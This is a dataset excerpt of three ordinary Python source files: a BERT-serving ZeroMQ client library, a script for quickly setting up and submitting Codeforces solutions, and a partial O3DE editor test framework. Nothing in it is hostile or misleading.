source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
import warnings
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BertClient', 'ConcurrentBertClient']
# in the future client version must match with server version
__version__ = '1.9.2'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
_Response = namedtuple('_Response', ['id', 'content'])
Response = namedtuple('Response', ['id', 'embedding', 'tokens'])
class BertClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray', show_server_config=False,
identity=None, check_version=True, check_length=True,
check_token_info=True, ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type check_length: bool
:type check_token_info: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
:param output_fmt: the output format of the sentence encodes, either in numpy array or python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check if server `max_seq_len` is less than the sentence length before sent
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.length_limit = 0
self.token_info_available = False
if not ignore_all_checks and (check_version or show_server_config or check_length or check_token_info):
s_status = self.server_status
if check_version and s_status['server_version'] != self.status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U bert-serving-server bert-serving-client"\n'
'or disable version-check by "BertClient(check_version=False)"' % (
s_status['server_version'], self.status['client_version']))
if check_length:
if s_status['max_seq_len'] is not None:
self.length_limit = int(s_status['max_seq_len'])
else:
self.length_limit = None
if check_token_info:
self.token_info_available = bool(s_status['show_tokens_to_client'])
if show_server_config:
self._print_dict(s_status, 'server config:')
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg, msg_len=0):
self.request_id += 1
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('tokens', ''))
@property
def status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary contains the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following:'
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary contains the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def encode(self, texts, blocking=True, is_tokenized=False, show_tokens=False):
""" Encode a list of strings to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
outer list represents sentence and inner list represent tokens in the sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
:type timeout: bool
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts is already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
:param texts: list of sentence to be encoded. Larger list for better efficiency.
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
if is_tokenized:
self._check_input_lst_lst_str(texts)
else:
self._check_input_lst_str(texts)
if self.length_limit is None:
warnings.warn('server does not put a restriction on "max_seq_len", '
'it will determine "max_seq_len" dynamically according to the sequences in the batch. '
'you can restrict the sequence length on the client side for better efficiency')
elif self.length_limit and not self._check_length(texts, self.length_limit, is_tokenized):
warnings.warn('some of your sentences have more tokens than "max_seq_len=%d" set on the server, '
'as consequence you may get less-accurate or truncated embeddings.\n'
'here is what you can do:\n'
'- disable the length-check by create a new "BertClient(check_length=False)" '
'when you do not want to display this warning\n'
'- or, start a new server with a larger "max_seq_len"' % self.length_limit)
req_id = self._send(jsonapi.dumps(texts), len(texts))
if not blocking:
return None
r = self._recv_ndarray(req_id)
if self.token_info_available and show_tokens:
return r.embedding, r.tokens
elif not self.token_info_available and show_tokens:
warnings.warn('"show_tokens=True", but the server does not support showing tokenization info to clients.\n'
'here is what you can do:\n'
'- start a new server with "bert-serving-start -show_tokens_to_client ..."\n'
'- or, use "encode(show_tokens=False)"')
return r.embedding
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there is no pending requests, will return None.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
R1 and R2, where R1 with 256 samples, R2 with 1 samples. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
Use it `encode(texts, blocking=False)`. If there is no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.embedding for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def encode_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
def run():
cnt = 0
for texts in batch_generator:
self.encode(texts, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_length(texts, len_limit, tokenized):
if tokenized:
# texts is already tokenized as list of str
return all(len(t) <= len_limit for t in texts)
else:
# do a simple whitespace tokenizer
return all(len(t.split()) <= len_limit for t in texts)
@staticmethod
def _check_input_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"%s" must be %s, but received %s' % (texts, type([]), type(texts)))
if not len(texts):
raise ValueError(
'"%s" must be a non-empty list, but received %s with %d elements' % (texts, type(texts), len(texts)))
for idx, s in enumerate(texts):
if not isinstance(s, _str):
raise TypeError('all elements in the list must be %s, but element %d is %s' % (type(''), idx, type(s)))
if not s.strip():
raise ValueError(
'all elements in the list must be non-empty string, but element %d is %s' % (idx, repr(s)))
if _py2:
texts[idx] = _unicode(texts[idx])
@staticmethod
def _check_input_lst_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"texts" must be %s, but received %s' % (type([]), type(texts)))
if not len(texts):
raise ValueError(
'"texts" must be a non-empty list, but received %s with %d elements' % (type(texts), len(texts)))
for s in texts:
BertClient._check_input_lst_str(s)
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBertClient(BertClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `check_version=False` and `check_length=False`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
"""
try:
from bert_serving.client import BertClient
except ImportError:
raise ImportError('BertClient module is not available, it is required for serving HTTP requests.'
'Please use "pip install -U bert-serving-client" to install it.'
'If you do not want to use it as an HTTP server, '
'then remove "-http_port" from the command line.')
self.available_bc = [BertClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections!'
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def encode(self, **kwargs):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def encode_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
|
fast_solve.py
|
import argparse
import os
import subprocess
import threading
from common.parse import parse_problem
def get_dest_file(problem, destination):
dest_dir = os.path.abspath(destination)
os.makedirs(dest_dir, exist_ok=True)
problem_code = problem.name[0].lower()
num = 0
while os.path.isfile(os.path.join(dest_dir, '{}{:03}.cpp'.format(problem_code, num))):
num += 1
return os.path.join(dest_dir, '{}{:03}.cpp'.format(problem_code, num))
class TextRewriter:
def __init__(self, src):
self.src = src
self.line_iter = iter(src.splitlines(True))
self.line = next(self.line_iter)
self.dst = ""
def next(self):
self.dst += self.line
self.line = next(self.line_iter, None)
def skip(self, dest, go_next=True):
while self.line.strip() != dest:
self.next()
if self.line is None:
return
if go_next:
self.next()
def add_text(self, text, prefix='// '):
for line in text.splitlines(True):
self.dst += prefix + line.strip() + '\n'
def init_slide(problem, dest_file):
subprocess.run(['slide', dest_file, 'init'])
with open(dest_file) as f:
src = f.read()
rewriter = TextRewriter(src)
rewriter.skip('/*!slide config')
rewriter.skip('*/')
rewriter.dst += '\n'
rewriter.add_text(problem.input)
rewriter.dst += '\n\n'
rewriter.add_text(problem.description)
rewriter.skip('//!slide end_input')
rewriter.add_text(problem.output)
rewriter.skip('/*!slide testdata')
rewriter.add_text('\n===\n'.join(map(str, problem.samples)), '')
rewriter.skip(None)
with open(dest_file, 'w') as f:
f.write(rewriter.dst)
def _do_start_slide_watch(dest_file, print_fail):
subprocess.run(['slide', dest_file, 'watch'] + (['--fail'] if print_fail else []))
def start_slide_watch(dest_file, print_fail):
thread = threading.Thread(target=_do_start_slide_watch, args=(dest_file, print_fail))
thread.start()
def submit_loop(problem, dest_file):
try:
while True:
input()
problem.submit(dest_file)
except KeyboardInterrupt:
pass
def main():
parser = argparse.ArgumentParser(description="Help to solve a CF problem fast")
parser.add_argument('url', help='URL of Problem')
parser.add_argument('--contin', '-c', help='Continue solving a problem')
parser.add_argument('--destination', '-d', default=os.getcwd(), help='Folder to save files')
parser.add_argument('--no-watch', '-w', action='store_true', help='Do not watch file')
parser.add_argument('--no-fail', '-f', action='store_true', help='Do not print fails')
parser.add_argument('--no-atom', '-a', action='store_true', help='Do not start atom')
args = parser.parse_args()
problem = parse_problem(args.url)
if not args.contin:
dest_file = get_dest_file(problem, args.destination)
init_slide(problem, dest_file)
else:
dest_dir = os.path.abspath(args.destination)
dest_file = os.path.join(dest_dir, args.contin)
print("Ready!")
if not args.no_atom:
subprocess.run(['atom', dest_file])
if not args.no_watch:
start_slide_watch(dest_file, not args.no_fail)
submit_loop(problem, dest_file)
if __name__ == '__main__':
main()
|
editor_test.py
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test-writing utilities that simplify creating O3DE in-Editor tests in Python.
Test writers should subclass a test suite from EditorTestSuite to hold the specification of python test scripts for
the editor to load and run. Tests can be parallelized (run in multiple editor instances at once) and/or batched
(multiple tests run in the same editor instance), with collated results and crash detection.
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSingleTest):
from . import script_to_be_run_by_editor as test_module
class MyTestInParallel_1(EditorParallelTest):
from . import another_script_to_be_run_by_editor as test_module
class MyTestInParallel_2(EditorParallelTest):
from . import yet_another_script_to_be_run_by_editor as test_module
"""
from __future__ import annotations
import abc
import functools
import inspect
import json
import logging
import math
import os
import pytest
import re
import tempfile
import threading
import types
import warnings
import _pytest.python
import _pytest.outcomes
from _pytest.skipping import pytest_runtest_setup as skip_pytest_runtest_setup
import ly_test_tools.environment.process_utils as process_utils
import ly_test_tools.o3de.editor_test_utils as editor_utils
from ly_test_tools.o3de.asset_processor import AssetProcessor
from ly_test_tools.launchers.exceptions import WaitTimeoutError
__test__ = False # This file contains ready-to-use test functions which are not actual tests, avoid pytest collection
logger = logging.getLogger(__name__)
class EditorTest(abc.ABC):
"""
Abstract Test targeting the O3DE Editor. The following attributes can be overridden by the test writer:
"""
# Test file that this test will run, must be set by user for EditorTest to execute
test_module = None
# Maximum time to allow the editor to run, in seconds
timeout = 180
# Attach debugger when running the test, useful for debugging crashes. Should never be left True in production.
# Where possible, also recommended to switch to EditorSingleTest for better debugging in isolation.
attach_debugger = False
# Wait until a debugger is attached at the startup of the test, this is another way of debugging.
wait_for_debugger = False
class EditorSingleTest(EditorTest):
"""
Test that will run alone in one editor with no parallel editors, limiting environmental side-effects at the
expense of redundant isolated work
"""
def __init__(self):
# Extra cmdline arguments to supply to the editor for the test
self.extra_cmdline_args = []
# Whether to use null renderer, this will override use_null_renderer for the Suite if not None
self.use_null_renderer = None
@staticmethod
def setup(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable setup function, which will run before the test.
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
pass
@staticmethod
def wrap_run(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable wrapper function, which will run both before and after test.
Any code before the 'yield' statement will run before the test. With code after yield run after the test.
Setup will run before wrap_run starts. Teardown will run after it completes.
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
yield
@staticmethod
def teardown(instance: EditorTestSuite.EditorTestClass, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_results: EditorTestSuite.TestData,
launcher_platform: str) -> None:
"""
User-overrideable teardown function, which will run after the test
:param instance: Parent EditorTestClass instance executing the test
:param request: PyTest request object
:param workspace: LyTestTools workspace manager
:param editor: LyTestTools editor-launcher object
:param editor_test_results: Currently recorded EditorTest results
:param launcher_platform: user-parameterized string for LyTestTools
"""
pass
class EditorSharedTest(EditorTest):
"""
Test that will run in parallel with tests in different editor instances, as well as serially batching with other
tests in each editor instance. Minimizes total test run duration.
Does not support per test setup/teardown to avoid creating race conditions
"""
# Specifies if the test can be batched in the same editor
is_batchable = True
# Specifies if the test can be run in multiple editors in parallel
is_parallelizable = True
class EditorParallelTest(EditorSharedTest):
"""
Test that will run in parallel with tests in different editor instances, though not serially batched with other
tests in each editor instance. Reduces total test run duration, while limiting side-effects between tests.
Does not support per test setup/teardown to avoid creating race conditions
"""
is_batchable = False
is_parallelizable = True
class EditorBatchedTest(EditorSharedTest):
"""
Test that will run serially batched with the tests in the same editor instance, though not executed in parallel with
other editor instances. Reduces overhead from starting the Editor, while limiting side-effects between editors.
Does not support per test setup/teardown to avoid creating race conditions
"""
is_batchable = True
is_parallelizable = False
class Result:
class EditorTestResultException(Exception):
""" Indicates that an unknown result was found during the tests """
class ResultType(abc.ABC):
"""
Generic result-type for data shared among results
"""
@abc.abstractmethod
def __str__(self):
# type () -> str
return ""
def get_output_str(self):
# type () -> str
"""
Checks if the output attribute exists and returns it.
:return: Output string from running a test, or a no output message
"""
output = getattr(self, "output", None)
if output:
return output
else:
return "-- No output --"
def get_editor_log_str(self):
# type () -> str
"""
Checks if the editor_log attribute exists and returns it.
:return: Either the editor_log string or a no output message
"""
log = getattr(self, "editor_log", None)
if log:
return log
else:
return "-- No editor log found --"
class Pass(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, editor_log: str):
"""
Represents a test success
:test_spec: The type of EditorTest
:output: The test output
:editor_log: The editor log's output
"""
self.test_spec = test_spec
self.output = output
self.editor_log = editor_log
def __str__(self):
output = (
f"Test Passed\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
)
return output
class Fail(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, editor_log: str):
"""
Represents a normal test failure
:test_spec: The type of EditorTest
:output: The test output
:editor_log: The editor log's output
"""
self.test_spec = test_spec
self.output = output
self.editor_log = editor_log
def __str__(self):
output = (
f"Test FAILED\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Crash(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, ret_code: int, stacktrace: str,
editor_log: str):
"""
Represents a test which failed with an unexpected crash
:test_spec: The type of EditorTest
:output: The test output
:ret_code: The test's return code
:stacktrace: The test's stacktrace if available
:editor_log: The editor log's output
"""
self.output = output
self.test_spec = test_spec
self.ret_code = ret_code
self.stacktrace = stacktrace
self.editor_log = editor_log
def __str__(self):
stacktrace_str = "-- No stacktrace data found --" if not self.stacktrace else self.stacktrace
output = (
f"Test CRASHED, return code {hex(self.ret_code)}\n"
f"---------------\n"
f"| Stacktrace |\n"
f"---------------\n"
f"{stacktrace_str}"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Timeout(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str, time_secs: float, editor_log: str):
"""
Represents a test which failed due to freezing, hanging, or executing slowly
:test_spec: The type of EditorTest
:output: The test output
:time_secs: The timeout duration in seconds
:editor_log: The editor log's output
:return: The Timeout object
"""
self.output = output
self.test_spec = test_spec
self.time_secs = time_secs
self.editor_log = editor_log
def __str__(self):
output = (
f"Test ABORTED after not completing within {self.time_secs} seconds\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Unknown(ResultType):
def __init__(self, test_spec: type(EditorTest), output: str = None, extra_info: str = None,
editor_log: str = None):
"""
Represents a failure that the test framework cannot classify
:test_spec: The type of EditorTest
:output: The test output
:extra_info: Any extra information as a string
:editor_log: The editor log's output
"""
self.output = output
self.test_spec = test_spec
self.editor_log = editor_log
self.extra_info = extra_info
def __str__(self):
output = (
f"Indeterminate test result interpreted as failure, possible cause: {self.extra_info}\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
@pytest.mark.parametrize("crash_log_watchdog", [("raise_on_crash", False)])
class EditorTestSuite:
# Extra cmdline arguments to supply for every editor instance for this test suite
global_extra_cmdline_args = ["-BatchMode", "-autotest_mode"]
# Tests usually run with no renderer, however some tests require a renderer and will disable this
use_null_renderer = True
# Maximum time in seconds for a single editor to stay open across the set of shared tests
timeout_editor_shared_test = 300
@staticmethod
def get_number_parallel_editors() -> int:
"""
Number of editors to run in parallel, this method can be overridden by the user.
Note: CLI option '--editors-parallel' takes precedence over class settings.
:return: count of parallel editors to run
"""
count = 1
found_processors = os.cpu_count()
if found_processors:
# only schedule on half the cores since the application will also run multithreaded
# also compensates for hyperthreaded/clustered/virtual cores inflating this count
count = math.floor(found_processors / 2)
if count < 1:
count = 1
return count
_TIMEOUT_CRASH_LOG = 20 # Maximum time (seconds) for waiting for a crash file to finish being dumped to disk
_TEST_FAIL_RETCODE = 0xF # Return code for test failure
class TestData:
__test__ = False # Tell PyTest to skip collecting this even though it has "Test" in the name; avoids warnings.
def __init__(self):
self.results = {} # Dict of str(test_spec.__name__) -> Result.ResultType
self.asset_processor = None
@pytest.fixture(scope="class")
def editor_test_data(self, request: _pytest.fixtures.FixtureRequest) -> EditorTestSuite.TestData:
"""
Yields a per-class structure to store the data of each test result and an AssetProcessor object that will be
re-used on the whole suite
:request: The Pytest request object
:yield: The TestData object
"""
yield from self._editor_test_data(request)
def _editor_test_data(self, request: _pytest.fixtures.FixtureRequest) -> EditorTestSuite.TestData:
"""
A wrapped implementation to simplify unit testing pytest fixtures. Users should not call this directly.
:request: The Pytest request object (unused, but always passed by pytest)
:yield: The TestData object
"""
test_data = EditorTestSuite.TestData()
yield test_data # yield to pytest while test-class executes
# resumed by pytest after each test-class finishes
if test_data.asset_processor: # was assigned an AP to manage
test_data.asset_processor.stop(1)
test_data.asset_processor.teardown()
test_data.asset_processor = None
editor_utils.kill_all_ly_processes(include_asset_processor=True)
else: # do not interfere as a preexisting AssetProcessor may be owned by something else
editor_utils.kill_all_ly_processes(include_asset_processor=False)
class Runner:
def __init__(self, name, func, tests):
self.name = name
self.func = func
self.tests = tests
self.run_pytestfunc = None
self.result_pytestfuncs = []
class EditorTestClass(pytest.Class):
"""
Custom pytest collector which programmatically adds test functions based on data in the TestSuite class
"""
def collect(self):
"""
This collector does the following:
1) Iterates through all the EditorSingleTest subclasses defined inside the suite.
Adds a test function to the suite to run each separately, and report results
2) Iterates through all the EditorSharedTest subclasses defined inside the suite,
grouping tests based on the specs in by 3 categories: batched, parallel and batched+parallel.
Each category gets a single test runner function registered to run all the tests of the category
A result function will be added for every individual test, which will pass/fail based on the results
from the previously executed runner function
"""
cls = self.obj
# Decorator function to add extra lookup information for the test functions
def set_marks(marks):
def spec_impl(func):
@functools.wraps(func)
def inner(*args, **argv):
return func(*args, **argv)
inner.marks = marks
return inner
return spec_impl
# Retrieve the test specs
single_tests = self.obj.get_single_tests()
shared_tests = self.obj.get_shared_tests()
batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=False, is_batchable=True)
parallel_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=False)
parallel_batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=True)
# user can provide CLI option to not parallelize/batch the tests
no_parallelize = self.config.getoption("--no-editor-parallel", default=False)
no_batch = self.config.getoption("--no-editor-batch", default=False)
if no_parallelize:
single_tests += parallel_tests
parallel_tests = []
batched_tests += parallel_batched_tests
parallel_batched_tests = []
if no_batch:
single_tests += batched_tests
batched_tests = []
parallel_tests += parallel_batched_tests
parallel_batched_tests = []
# Add the single tests, these will run separately
for test_spec in single_tests:
name = test_spec.__name__
def make_test_func(inner_test_spec):
@set_marks({"run_type": "run_single"})
def single_run(self, request, workspace, editor, editor_test_data, launcher_platform):
# only single tests are allowed to have setup/teardown, however we can have shared tests that
# were explicitly set as single, for example via cmdline argument override
is_single_test = issubclass(inner_test_spec, EditorSingleTest)
if is_single_test:
# Setup step for wrap_run
wrap = inner_test_spec.wrap_run(self, request, workspace, editor, editor_test_data, launcher_platform)
assert isinstance(wrap, types.GeneratorType), "wrap_run must return a generator, did you forget 'yield'?"
next(wrap, None)
# Setup step
inner_test_spec.setup(self, request, workspace, editor, editor_test_data, launcher_platform)
# Run
self._run_single_test(request, workspace, editor, editor_test_data, inner_test_spec)
if is_single_test:
# Teardown
inner_test_spec.teardown(self, request, workspace, editor, editor_test_data, launcher_platform)
# Teardown step for wrap_run
next(wrap, None)
return single_run
f = make_test_func(test_spec)
if hasattr(test_spec, "pytestmark"):
f.pytestmark = test_spec.pytestmark
setattr(self.obj, name, f)
# Add the shared tests, with a runner class for storing information from each shared run
runners = []
def create_runner(runner_name, function, tests):
target_runner = EditorTestSuite.Runner(runner_name, function, tests)
def make_func():
@set_marks({"runner": target_runner, "run_type": "run_shared"})
def shared_run(self, request, workspace, editor, editor_test_data, launcher_platform):
getattr(self, function.__name__)(request, workspace, editor, editor_test_data, target_runner.tests)
return shared_run
setattr(self.obj, runner_name, make_func())
# Add the shared tests results, which succeed/fail based what happened on the Runner.
for shared_test_spec in tests:
def make_func(inner_test_spec):
@set_marks({"runner": target_runner, "test_spec": inner_test_spec, "run_type": "result"})
def result(self, request, workspace, editor, editor_test_data, launcher_platform):
result_key = inner_test_spec.__name__
# The runner must have filled the editor_test_data.results dict fixture for this test.
# Hitting this assert could mean if there was an error executing the runner
if result_key not in editor_test_data.results:
raise Result.EditorTestResultException(f"No results found for {result_key}. "
f"Test may not have ran due to the Editor "
f"shutting down. Check for issues in previous "
f"tests.")
cls._report_result(result_key, editor_test_data.results[result_key])
return result
result_func = make_func(shared_test_spec)
if hasattr(shared_test_spec, "pytestmark"):
result_func.pytestmark = shared_test_spec.pytestmark
setattr(self.obj, shared_test_spec.__name__, result_func)
runners.append(target_runner)
create_runner("run_batched_tests", cls._run_batched_tests, batched_tests)
create_runner("run_parallel_tests", cls._run_parallel_tests, parallel_tests)
